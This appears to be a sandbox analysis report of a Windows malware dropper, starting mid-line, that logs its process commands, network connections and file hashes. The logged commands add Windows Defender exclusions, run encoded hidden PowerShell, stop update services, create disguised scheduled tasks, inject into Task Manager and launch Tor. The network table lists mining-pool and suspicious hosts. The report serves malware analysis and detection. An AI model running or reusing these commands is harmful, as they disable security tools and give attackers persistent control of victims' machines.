\"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\VeitDxgWDfCRoOtN\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\VeitDxgWDfCRoOtN\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AtBFliYUSCIU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AtBFliYUSCIU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AtBFliYUSCIU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KLjJYzCUqgUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KLjJYzCUqgUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KcvIfpBEU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KcvIfpBEU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OFVgegHnELnCC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OFVgegHnELnCC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\aFeOAQnlubilNTVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\aFeOAQnlubilNTVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\VeitDxgWDfCRoOtN /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\VeitDxgWDfCRoOtN /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gkUCcFcjT" /SC once /ST 03:10:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gkUCcFcjT"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gkUCcFcjT"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "AtBWxWZQPczPtNlnn" /SC once /ST 15:25:38 /RU "SYSTEM" /TR "\"C:\Windows\Temp\VeitDxgWDfCRoOtN\JREGxNGCKgjMZve\xcZvMbu.exe\" nf /Zssite_idqtN 385118 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "AtBWxWZQPczPtNlnn"
C:\Windows\Temp\VeitDxgWDfCRoOtN\JREGxNGCKgjMZve\xcZvMbu.exe
C:\Windows\Temp\VeitDxgWDfCRoOtN\JREGxNGCKgjMZve\xcZvMbu.exe nf /Zssite_idqtN 385118 /S
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bSTfouYtWkypYZNMeg"
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\KcvIfpBEU\DsPYJr.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "tPKRaMnTrSPPzpw" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "tPKRaMnTrSPPzpw2" /F /xml "C:\Program Files (x86)\KcvIfpBEU\YCgwUJq.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "tPKRaMnTrSPPzpw"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "tPKRaMnTrSPPzpw"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "adfRLMJfxNTLtT" /F /xml "C:\Program Files (x86)\AtBFliYUSCIU2\dROlsqs.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "KDnJrqmubUqQR2" /F /xml "C:\ProgramData\aFeOAQnlubilNTVB\SxVWXHC.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "QrnxlXQtqLuhZDTpp2" /F /xml "C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR\uytAyRN.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "frJpXGSvGdttwfSkGFg2" /F /xml "C:\Program Files (x86)\OFVgegHnELnCC\DdLstpe.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "GZVqxQnXgrdNzWCPM" /SC once /ST 06:51:16 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\VeitDxgWDfCRoOtN\LbEltzqf\GdYNwFS.dll\",#1 /aqsite_idmwH 385118" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "GZVqxQnXgrdNzWCPM"
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\VeitDxgWDfCRoOtN\LbEltzqf\GdYNwFS.dll",#1 /aqsite_idmwH 385118
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\VeitDxgWDfCRoOtN\LbEltzqf\GdYNwFS.dll",#1 /aqsite_idmwH 385118
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "GZVqxQnXgrdNzWCPM"
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\sc.exe
sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "AtBWxWZQPczPtNlnn"
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.255.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 188.114.97.0:443 | yip.su | tcp |
| US | 104.20.67.143:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | julimichkids.online | udp |
| US | 8.8.8.8:53 | gobo23cl.top | udp |
| US | 8.8.8.8:53 | gobo24cl.top | udp |
| MY | 111.90.146.230:80 | tcp | |
| US | 8.8.8.8:53 | flyawayaero.net | udp |
| US | 8.8.8.8:53 | lycheepanel.info | udp |
| US | 8.8.8.8:53 | redirector.pm | udp |
| US | 8.8.8.8:53 | rawcracker.com | udp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| US | 194.49.94.67:80 | tcp | |
| DE | 88.198.22.18:443 | julimichkids.online | tcp |
| US | 104.21.43.7:80 | gobo23cl.top | tcp |
| US | 188.114.97.0:443 | rawcracker.com | tcp |
| US | 104.21.93.225:443 | flyawayaero.net | tcp |
| US | 104.21.32.208:443 | lycheepanel.info | tcp |
| US | 194.49.94.85:443 | redirector.pm | tcp |
| NL | 185.26.182.112:80 | net.geo.opera.com | tcp |
| US | 188.114.96.0:80 | rawcracker.com | tcp |
| NL | 185.26.182.112:443 | net.geo.opera.com | tcp |
| US | 104.21.43.7:443 | gobo23cl.top | tcp |
| US | 188.114.96.0:443 | rawcracker.com | tcp |
| US | 8.8.8.8:53 | potatogoose.com | udp |
| US | 8.8.8.8:53 | bobkelsofan.com | udp |
| US | 8.8.8.8:53 | 0.97.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.67.20.104.in-addr.arpa | udp |
| US | 172.67.180.173:443 | potatogoose.com | tcp |
| US | 104.21.27.119:443 | bobkelsofan.com | tcp |
| US | 8.8.8.8:53 | 7.43.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.93.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.182.26.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.32.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.94.49.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.96.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.22.198.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.180.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.27.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | autoupdate.geo.opera.com | udp |
| US | 8.8.8.8:53 | desktop-netinstaller-sub.osp.opera.software | udp |
| NL | 82.145.216.20:443 | autoupdate.geo.opera.com | tcp |
| NL | 82.145.216.20:443 | autoupdate.geo.opera.com | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 8.8.8.8:53 | 20.216.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.217.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | features.opera-api2.com | udp |
| US | 8.8.8.8:53 | download.opera.com | udp |
| NL | 82.145.216.15:443 | features.opera-api2.com | tcp |
| NL | 82.145.216.23:443 | download.opera.com | tcp |
| US | 8.8.8.8:53 | download3.operacdn.com | udp |
| NL | 104.110.240.11:443 | download3.operacdn.com | tcp |
| TR | 185.216.70.235:80 | 185.216.70.235 | tcp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 172.67.75.163:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 15.216.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.216.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.240.110.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.75.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.70.216.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.178.238.8.in-addr.arpa | udp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 8.8.8.8:53 | 126.211.247.8.in-addr.arpa | udp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.249.124.192.in-addr.arpa | udp |
| DE | 167.235.143.166:443 | tcp | |
| US | 8.8.8.8:53 | 166.143.235.167.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| DE | 167.235.143.166:443 | tcp | |
| DE | 167.235.143.166:443 | tcp | |
| DE | 167.235.143.166:443 | tcp | |
| DE | 167.235.143.166:443 | tcp | |
| DE | 167.235.143.166:443 | tcp | |
| DE | 167.235.143.166:443 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 167.235.143.166:443 | tcp | |
| DE | 167.235.143.166:443 | tcp | |
| DE | 167.235.143.166:443 | tcp | |
| DE | 167.235.143.166:443 | tcp | |
| DE | 167.235.143.166:443 | tcp | |
| DE | 167.235.143.166:443 | tcp | |
| DE | 167.235.143.166:443 | tcp | |
| US | 8.8.8.8:53 | 1.208.79.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | host-file-host6.com | udp |
| US | 8.8.8.8:53 | host-host-file8.com | udp |
| US | 95.214.26.28:80 | host-host-file8.com | tcp |
| US | 8.8.8.8:53 | 28.26.214.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| FR | 51.15.193.130:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | 130.193.15.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | f2b94aee-d258-426d-80b3-6d839b5bc858.uuid.realupdate.ru | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.67.143:443 | pastebin.com | tcp |
| FR | 51.15.193.130:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | 13.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | service-domain.xyz | udp |
| US | 3.80.150.121:443 | service-domain.xyz | tcp |
| US | 8.8.8.8:53 | 121.150.80.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.33.222.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.25.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| NL | 142.251.36.46:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | 138.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.36.251.142.in-addr.arpa | udp |
| NL | 142.251.36.1:443 | clients2.googleusercontent.com | tcp |
| NL | 142.251.36.46:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | 46.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | vk.com | udp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:443 | vk.com | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | 67.132.240.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | server7.realupdate.ru | udp |
| US | 8.8.8.8:53 | stun.stunprotocol.org | udp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| BG | 185.82.216.96:443 | server7.realupdate.ru | tcp |
| US | 8.8.8.8:53 | walkinglate.com | udp |
| US | 8.8.8.8:53 | api2.check-data.xyz | udp |
| US | 188.114.97.0:443 | walkinglate.com | tcp |
| US | 8.8.8.8:53 | 233.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.21.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.216.82.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.20.18.104.in-addr.arpa | udp |
| US | 44.240.219.117:80 | api2.check-data.xyz | tcp |
| US | 8.8.8.8:53 | 117.219.240.44.in-addr.arpa | udp |
| DE | 185.220.101.30:8443 | tcp | |
| NL | 194.26.192.187:443 | tcp | |
| US | 8.8.8.8:53 | 187.192.26.194.in-addr.arpa | udp |
| DE | 5.189.181.61:443 | tcp | |
| US | 8.8.8.8:53 | 61.181.189.5.in-addr.arpa | udp |
Files
memory/4624-0-0x0000000074A30000-0x00000000751E0000-memory.dmp
memory/4624-1-0x0000000000AA0000-0x0000000001980000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
| MD5 | cba9c1d1fcbf999d9ccb04050c5c5154 |
| SHA1 | 554e436c9c3f1f16c9a9b7ab74dd4cd191118481 |
| SHA256 | c3ab7948969593528e883956dc2cb0a754a4832076bc2e9b6c4f1c7ce2002842 |
| SHA512 | c7d8be36705e08fcd8a7ed8a319aac2aa1d26397081a75511408d51871daa05e21c89be7428eda8a5f7f757ba0c0e74e710e8515b26c89c19b8d7f480a1c0a0b |
C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
| MD5 | cba9c1d1fcbf999d9ccb04050c5c5154 |
| SHA1 | 554e436c9c3f1f16c9a9b7ab74dd4cd191118481 |
| SHA256 | c3ab7948969593528e883956dc2cb0a754a4832076bc2e9b6c4f1c7ce2002842 |
| SHA512 | c7d8be36705e08fcd8a7ed8a319aac2aa1d26397081a75511408d51871daa05e21c89be7428eda8a5f7f757ba0c0e74e710e8515b26c89c19b8d7f480a1c0a0b |
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 8ef35a51d9b58606554128b7556ceac2 |
| SHA1 | 7db9caaa38f1d8bbf36c200e8f721e8e2569cf30 |
| SHA256 | b193ce6afc9a17e3e56c5a6944db038c0c88fb25e551acc551dd2a019786590e |
| SHA512 | 92be8d6f87d89d762ee25a8546eedc1e0fdce6f25685b59070555b2587e3f011712ebe725326b57cbaeb041dcc2551672342d1830d6b2df05c8183696d21df24 |
